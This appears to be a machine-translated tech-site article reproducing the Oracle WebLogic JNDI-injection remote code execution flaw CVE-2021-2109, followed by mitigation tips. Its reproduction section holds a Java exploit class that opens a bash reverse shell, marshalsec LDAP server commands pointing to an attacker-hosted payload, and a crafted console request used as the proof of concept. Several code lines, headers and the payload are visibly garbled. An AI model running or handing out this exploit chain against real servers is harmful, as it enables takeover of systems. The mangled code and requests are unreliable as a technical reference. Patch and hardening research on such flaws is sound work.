Shulou(Shulou.com)05/31 Report--

This article shows you how to achieve Weblogic Server remote code execution vulnerability CVE-2021-2109 analysis, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article, I hope you can get something.

CVE-2021-2109 Weblogic remote code execution

I. brief introduction of loopholes

Oracle has officially released a patch that fixes several high-risk and serious vulnerabilities, including the CVE-2021-2109 Weblogic Server remote code execution vulnerability. In CVE-2021-2109, an attacker can construct a malicious request, cause JNDI injection, execute arbitrary code, and thus control the server.

Second, influence the version

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

III. Recurrence of loopholes

Environment preparation: WebLogic 10.3.6.0.0 (win)

Log in to the backend:

Http://192.168.1.111:7001/console/login/LoginForm.jsp

Start the Ldap service:

For specific methods, please refer to the previous fastjson method:

Recurrence of Fastjson1.2.47 deserialization vulnerability

Specific address: https://mp.weixin.qq.com/s/69NCDDSaa07YY7DwyC9fgA

Save the following exp as an Exploit.java file

Import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit {public Exploit () throws Exception {/ / Process p = Runtime.getRuntime (). Exec (new String [] {"cmd", "/ c", "calc.exe"}); Process p = Runtime.getRuntime (). Exec (new String [] {"/ bin/bash", "- c", "exec 5devxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxpxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx BufferedReader reader = new BufferedReader (new InputStreamReader (is)); String line; while ((line = reader.readLine ())! = null) {System.out.println (line);} p.waitFor (); is.close (); reader.close (); p.destroy ();} public static void main (String [] args) throws Exception {}}

Javac Exploit.java compiles to generate Exploit.class files

Python starts the web service

Python-m SimpleHTTPServer 1111

Start the exphttp service through python to start the ldap service (RMI service)

The ldap service is used in this replay, and the corresponding operations of RMI are also screenshot, mainly because the JDk version of RMI is supported, and the version of LDAPJava is supported in this environment (pay attention to the version of JDK, which is the key to success).

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://XX.XX.XX.XX:1111/\#Exploit 999

Ldap grabs packets to access modified packets

GET / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldaplapplash rv:84.0) HTTP/1.1Host: 192.168.1.111:7001User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh Gzip, deflateReferer: http://192.168.1.111:7001/console/login/LoginForm.jspConnection: closeCookie: ADMINCONSOLESESESSION UXojCN1OOOOOF FkguAuuU35Z6tZ2guzmMUTskIjOizb35HOL6AwZClClure: 2080081994; JSESSIONIDopia sKsgWcOgre9zQdntt3QYv14IleXkZ94jYtY4fEIOdNBaQtBeVcoding: 18779164Upgravity request: 1

POC:

GET / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldaplapplash HTTP/1.1 192.168.1Trachexxxxxxxxxxxx) HTTP/1.1

Effect of successful execution

Specific demonstration demo video: https://mp.weixin.qq.com/s/nTfnRlAbAa7WjLsCBRx30g

IV. Security recommendation 1. Disable T3 protocol

If you do not rely on T3 protocol for JVM communication, you can mitigate the impact of this vulnerability by temporarily blocking T3 protocol.

1)。 Go to the Weblogic console, on the base_domain configuration page, go to the "Security" tab page, click "filter" and configure the filter.

2)。 Enter: weblogic.security.net.ConnectionFilterImpl in the connection filter and * * 7001 deny T3 T3 in the connection filter rule box.

2. Disable enabling IIOP

Log in to the Weblogic console, find the option to enable IIOP, uncheck it, and restart takes effect.

3, temporarily close the background / console/console.portal external access 4, upgrade the official security patch, the above is how to achieve Weblogic Server remote code execution vulnerability CVE-2021-2109 analysis, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.